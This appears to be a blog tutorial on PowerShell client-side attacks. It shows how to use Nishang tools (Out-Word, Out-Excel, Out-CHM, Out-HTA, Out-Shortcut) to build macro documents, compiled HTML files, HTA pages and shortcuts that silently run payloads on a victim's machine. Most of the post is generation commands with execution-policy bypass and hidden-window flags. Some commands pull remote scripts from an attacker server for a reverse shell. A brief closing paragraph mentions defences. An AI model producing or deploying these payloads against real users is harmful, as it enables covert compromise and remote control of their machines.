Client-side attacks are one of the most common ways adopted by a hacker. If the user downloads or execute malicious content in their operating system this leads to client-side attacks. An attacker can create the payload with Microsoft word, excel, media players, browsers, etc.
To perform this attack we will create a crafted payload with native functions of the operating system. Here the power shell takes place. usually, the operating system will have native features so we can create a crafted payload to exploit the targets. For which we can use PowerShell.
This blog post will talk about client-side attacks with PowerShell and we will also look into tools and techniques to perform this client-side this client-side attacks.
What is PowerShell?
PowerShell is a cross-platform task automation and configuration management framework, comprising a command-line shell and scripting language.
Why Powershell?
Powershell is presented already in all the windows operating systems. It can easily access the windows files like .net classes, WMI, windows API, winRM and registry. It can also result in the impressive post-exploitation of the victim system.
Using Powershell For client-side Attacks
In this attack, we are using powerscript tools from Nishang and PowerSploit
out-word.ps1
This powerscript is used to generate the infected word document. The document will auto-execute the macro and run the PowerShell payload in the victim machine. The payload will execute silently without affecting the word document.
Command to generate the file:
out-word -Payload “powershell.exe -ExecutionPolicy Bypass -noprofile -noexit — Get-Process”
Note: If the macros are blocked on word, then it will throw a warning to execute the macros and if it enabled then there will be no warnings.
out-excel.ps1
MS Excel also works like MSword with similar features and payloads. It is a more preferred method than using MSword.
out-excel -Payload “powershell.exe -ExecutionPolicy Bypass -noprofile -noexit — Get-Process”
We can also use get the reverse shell by using below payload, where “IP” us attacker owned server IP to receive reverse connections.
Out-Excel -PayloadURL http://ip/metospolit.ps1
out-CHM.ps1
In this method, we will create compiled HTML files to execute the power shell. First, we have to create malicious powerscript. Then use Invoke-Encode to encode the payload.
Invoke-Encode -DataToEncode .\excel.ps1 -OutCommand
After which get the encoded file from the outcommand switch.
Then Use the out-CHM to create the HTML file
Out-CHM -Payload “ -e encrypted file” -HHCPath ‘C:\Program Files (x86)\HTML Help Workshop\
out-HTA.ps1
out-HTA is used to create a malicious HTML page with VBScript. It will be diploid on the webserver. If the victim opens the HTA, it will run the VBScript and execute the particular PowerShell payload.
Use below command to generate the files:
Out-HTA -Payload “powershell.exe — ExecutionPolicy Bypass -noprofile -noexit -c Get-ChildItem”
We can send the payload to the webserver by using,
Out-HTA -PayloadURL http://127.0.0.1/powerpreter.psml -Arguments check -VM
out-shortcut.ps1
out-shortcut is used to create a shortcut to execute the PowerShell scripts. If the victim clicked the shortcut then it will execute the predefined payloads.
Use below command to generate the files:
Out-Shortcut -Payload “-windowstyle hidden -ExecutionPolicy Bypass — noprofile -noexit -c Get-childitem”
we can also set the hotkey to execute the payload in shortcut
Out-Shortcut -PayloadeR http://192.168.254.1/powerpreter psml -Arguments Check-VM — Hotkey ‘F3’ Icon ‘notepad.exe’
We saw in this post the different ways possible to perform the client-side attack using powershell. To avoid these attacks, make sure to disable powershell and macros by configuration. Also, log the powershell event in the security monitoring solutions to catch any malicious execution.
Hope you had a good time reading this. Please post your comments below.
